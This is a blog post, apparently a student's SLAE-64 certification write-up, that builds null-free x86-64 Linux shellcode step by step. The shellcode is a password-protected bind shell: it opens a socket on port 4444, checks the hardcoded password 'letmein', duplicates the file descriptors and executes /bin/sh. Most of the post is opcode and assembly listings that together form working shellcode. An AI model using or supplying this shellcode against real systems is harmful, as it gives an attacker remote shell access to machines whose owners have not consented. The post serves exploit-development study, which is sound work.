Tags: assembly, slae-64, shellcode
This post is the first of seven that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post will correspond to seven assignments of varying difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving in to OSCE.
I used nasmshell to figure out which instruction combinations resulted in the fewest number of non-null opcodes. For this assignment, I only used techniques taught within the course, or what I came across in documentation. Basically, I didn’t look at other shellcode examples except for what was covered in the course. My reasoning being that I could establish a performance baseline for myself. After I complete some of the other assignments that require me to analyze other people’s shellcode, I plan to come back and apply whatever fancy tricks I pick up as a result to this shellcode.
The general steps to setup a listening socket can be listed out via a handful of linux syscalls as seen below.
After the accept syscall, operations may be performed on the socket such as recv/read and send/write. If you’re looking for a more in depth explanation of socket programming using syscalls, do yourself a favor and check out Beej’s Guide to Network Programming.
To pass parameters to a syscall (since that is all this post is concerned with), up to six registers may be used and are shown below in the order in which they are to be populated. The syscall number itself will be stored in rax.
The following image illustrates that to use a C function definition, the arguments it accepts directly correspond to the registers above when read from left-to-right. I show this as a quick reference to assist in reading the assembly and syscall definitions below.
The first step to create a bind shell on linux is to create a socket. Below you can see that the syscall number for socket is 41, and that it takes three int’s as arguments. socket()
creates an endpoint for communication and returns a file descriptor that refers to that endpoint.
#define __NR_socket 41
int socket(int domain, int type, int protocol);
/*
* rax -> 41 -> socket sycall
* rdi -> 2 (AF_INET) -> domain
* rsi -> 1 (SOCK_STREAM) -> type
* rdx -> 0 -> protocol
*/
Python can be used to determine the values of the constants you would normally see used in C socket programming code.
>>> import socket
>>> socket.AF_INET
2
>>> socket.SOCK_STREAM
1
>>> socket.INADDR_ANY
0
First up, the original shellcode with null-bytes. On the left are the opcodes generated by the corresponding assembly instructions on the right. The gist of this snippet is that a socket is created with the socket syscall and the resulting file descriptor is stored in the rdi register. The resulting shellcode is 25 bytes long to make this single syscall and it’s riddled with null-bytes.
b8 29 00 00 00 mov eax,0x29
bf 02 00 00 00 mov edi,0x2
be 01 00 00 00 mov esi,0x1
ba 00 00 00 00 mov edx,0x0
0f 05 syscall
48 89 c7 mov rdi,rax
Here is what I was able to come up with. 14 bytes long and no nulls.
6a 29 push 0x29
58 pop rax
6a 02 push 0x2
5f pop rdi
6a 01 push 0x1
5e pop rsi
31 d2 xor edx,edx
0f 05 syscall
97 xchg edi,eax ; store file descriptor in rdi
When a socket is created with socket()
, it exists in a name space (address family) but has no address assigned to it. bind()
assigns the address specified by addr to the socket referred to by the file descriptor sockfd. This and all following sections will follow the same pattern as the first where the socket was created.
#define __NR_bind 49
int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
/* rax -> 49
* rdi -> fd already stored in rdi
* rsi -> pointer to 16 bytes of space groomed to contain a sockaddr_in struct
* rdx -> length of rsi (16)
*/
struct sockaddr_in {
sa_family_t sin_family; /* address family: AF_INET */
in_port_t sin_port; /* port in network byte order */
struct in_addr sin_addr; /* internet address */
};
Python can be used to convert a numeric port number into a format that sockaddr_in will understand.
>>> import socket
>>> port = 4444
>>> hex(socket.htons(port))
'0x5c11'
Original shellcode: 41 bytes
; prepare the 16 bytes to pass as sockaddr using the stack
48 31 c0 xor rax,rax
50 push rax
89 44 24 fc mov DWORD PTR [rsp-0x4],eax
66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
66 c7 44 24 f8 02 00 mov WORD PTR [rsp-0x8],0x2
48 83 ec 08 sub rsp,0x8
; make bind syscall
b8 31 00 00 00 mov eax,0x31
48 89 e6 mov rsi,rsp
ba 10 00 00 00 mov edx,0x10
0f 05 syscall
My shellcode: 24 bytes
; prepare the 16 bytes to pass as sockaddr using the stack
; 2 pushes to get the 00 in between 0x5c11 and 02
52 push rdx
52 push rdx
66 c7 44 24 02 11 5c mov WORD PTR [rsp+0x2],0x5c11
c6 04 24 02 mov BYTE PTR [rsp],0x2
48 89 e6 mov rsi,rsp
; make bind syscall
6a 31 push 0x31
58 pop rax
6a 10 push 0x10
5a pop rdx
0f 05 syscall
listen()
marks the socket referred to by sockfd as a passive socket, that is, as a socket that will be used to accept incoming connection requests using accept(2).
#define __NR_listen 50
int listen(int sockfd, int backlog);
/* rax -> 50
* rdi -> fd already stored in rdi
* rsi -> 1
*/
Original shellcode: 12 bytes
b8 32 00 00 00 mov eax,0x32
be 02 00 00 00 mov esi,0x2
0f 05 syscall
My shellcode: 8 bytes
6a 32 push 0x32
58 pop rax
6a 01 push 0x1
5e pop rsi
0f 05 syscall
The accept()
system call is used with connection-based socket types (SOCK_STREAM, SOCK_SEQPACKET). It extracts the first connection request on the queue of pending connections for the listening socket, sockfd, creates a new connected socket, and returns a new file descriptor referring to that socket. The newly created socket is not in the listening state. The original socket sockfd is unaffected by this call.
The argument sockfd is a socket that has been created with socket()
, bound to a local address with bind()
, and is listening for connections after a listen()
.
#define __NR_accept 43
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
/* rax -> 43
* rdi -> fd already stored in rdi
* rsi -> pointer to 16 bytes of space that will be populated by the client connection
* rdx -> pointer to length of rsi (16)
*/
struct sockaddr_in {
sa_family_t sin_family; /* address family: AF_INET */
in_port_t sin_port; /* port in network byte order */
struct in_addr sin_addr; /* internet address */
};
Original shellcode: 29 bytes
b8 2b 00 00 00 mov eax,0x2b
48 83 ec 10 sub rsp,0x10
48 89 e6 mov rsi,rsp
c6 44 24 ff 10 mov BYTE PTR [rsp-0x1],0x10
48 83 ec 01 sub rsp,0x1
48 89 e2 mov rdx,rsp
0f 05 syscall
49 89 c1 mov r9,rax
My shellcode: 19 bytes
6a 2b push 0x2b
58 pop rax
99 cdq ; zero out rdx using sign extension
52 push rdx
52 push rdx
48 89 e6 mov rsi,rsp ; when populated, client will be stored in rsi
6a 10 push 0x10
48 8d 14 24 lea rdx,[rsp]
0f 05 syscall
; store client socket descriptor in r9 to restore after closing the parent
49 91 xchg r9,rax
This is the first section where I added additional logic to satisfy the authentication requirement. The close_call
label gets reused in the event of a bad password. close()
closes a file descriptor, so that it no longer refers to any file and may be reused.
#define __NR_close 3
int close(int fd);
/* rax -> 3
* rdi -> fd already stored in rdi
*/
Original shellcode: 10 bytes
b8 03 00 00 00 mov eax,0x3
0f 05 syscall
4c 89 cf mov rdi,r9
My shellcode: 15 bytes
6a 03 push 0x3
58 pop rax
0f 05 syscall
; restore client socket descriptor to rdi
4c 89 cf mov rdi,r9
; close gracefully if we get here from a bad password
74 07 je 4000d2 <read_call>
6a 3c push 0x3c
58 pop rax
0f 05 syscall
For this section, there is no original shellcode. I’ll just outline what mine is doing. read()
attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.
#define __NR_read 0
ssize_t read(int fd, void *buf, size_t count);
/* rax -> 0
* rdi -> client already stored in rdi
* rsi -> 24 bytes allocated should be good
* rdx -> 24
*/
Python can be used to prepare the password to be stored on the stack.
>>> import binascii
>>> binascii.hexlify(b'letmein\n'[::-1])
'0a6e69656d74656c'
I wrote a small bash function that handles the above python instead of spinning up an interpreter each time I want a different string.
flipstring() {
python3 -c "import binascii; print(binascii.hexlify(b'${1}'[::-1]))"
}
The two primary tasks here are to get user-input and compare it to our password.
; read the password
31 c0 xor eax,eax ; zero out rax for the syscall number
48 83 ec 18 sub rsp,0x18 ; allocate 24 bytes on the stack
48 89 e6 mov rsi,rsp ; make rsi point to those 24 bytes
6a 18 push 0x18
5a pop rdx ; store the size of the buffer in rdx
0f 05 syscall
; compare the password
48 b8 6c 65 74 6d 65 movabs rax,0xa6e69656d74656c ; password -> letmein\n
69 6e 0a
48 8d 3e lea rdi,[rsi] ; load user-input
48 af scas rax,QWORD PTR es:[rdi] ; compare rax and rdi
4c 89 cf mov rdi,r9 ; put client connection back in rdi
75 cf jne 4000c1 <close_call> ; close socket if they're not equal
The dup()
system call creates a copy of the file descriptor oldfd, using the lowest-numbered unused file descriptor for the new descriptor. After a successful return, the old and new file descriptors may be used interchangeably.
#define __NR_dup2 33
int dup2(int oldfd, int newfd);
/* rax -> 33
* rdi -> client socket
* rsi -> 2 -> 1 -> 0 (3 iterations)
*/
Original shellcode: 36 bytes
b8 21 00 00 00 mov eax,0x21
be 00 00 00 00 mov esi,0x0
0f 05 syscall
b8 21 00 00 00 mov eax,0x21
be 01 00 00 00 mov esi,0x1
0f 05 syscall
b8 21 00 00 00 mov eax,0x21
be 02 00 00 00 mov esi,0x2
0f 05 syscall
My shellcode: 20 bytes
As a side-note, I really thought I was going to be able to make a small loop reusing rcx as file descriptor, but it didn’t turn out quite the way I thought it would. I think this is going to be a place in the code that I return to for some easy improvement later.
6a 03 push 0x3
59 pop rcx ; # of iterations
6a 02 push 0x2
5b pop rbx ; used as file desciptor
00000000004000f8 <dup2_loop>:
6a 21 push 0x21
58 pop rax
89 de mov esi,ebx ; 2 -> 1 -> 0 (3 iterations)
51 push rcx ; preserve counter across syscalls
0f 05 syscall
59 pop rcx
48 ff cb dec rbx
e2 f2 loop 4000f8 <dup2_loop>
I modified this section a bit, but there wasn’t a whole lot of room for improvement that I could see. execve()
executes the program pointed to by filename.
#define __NR_execve 59
int execve(const char *filename, char *const argv[], char *const envp[]);
/* rax -> 59
* rdi -> "/bin//sh", 0x0
* rsi -> [addr of bin/sh], 0x0
* rdx -> 0x0
*/
Original shellcode: 32 bytes
48 31 c0 xor rax,rax
50 push rax
48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
2f 73 68
53 push rbx
48 89 e7 mov rdi,rsp
50 push rax
48 89 e2 mov rdx,rsp
57 push rdi
48 89 e6 mov rsi,rsp
48 83 c0 3b add rax,0x3b
0f 05 syscall
My shellcode: 28 bytes
31 d2 xor edx,edx
52 push rdx
48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
2f 73 68
53 push rbx
48 89 e7 mov rdi,rsp
52 push rdx
57 push rdi
48 89 e6 mov rsi,rsp
48 8d 42 3b lea rax,[rdx+0x3b]
0f 05 syscall
Once the call to execve happens, the client now has a shell on the system. As far as the compression and removing nulls part of the assignment, nulls were successfully removed and the final tally of bytes:
I’m still confident that there is a lot of room for improvement on my part. My plan is to revisit the first and second assignments and apply any new concepts I learn while performing the shellcode analysis of later assignments. Feel free to check out the source code.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: E64-1584
My SLAE-64 Assignments Repository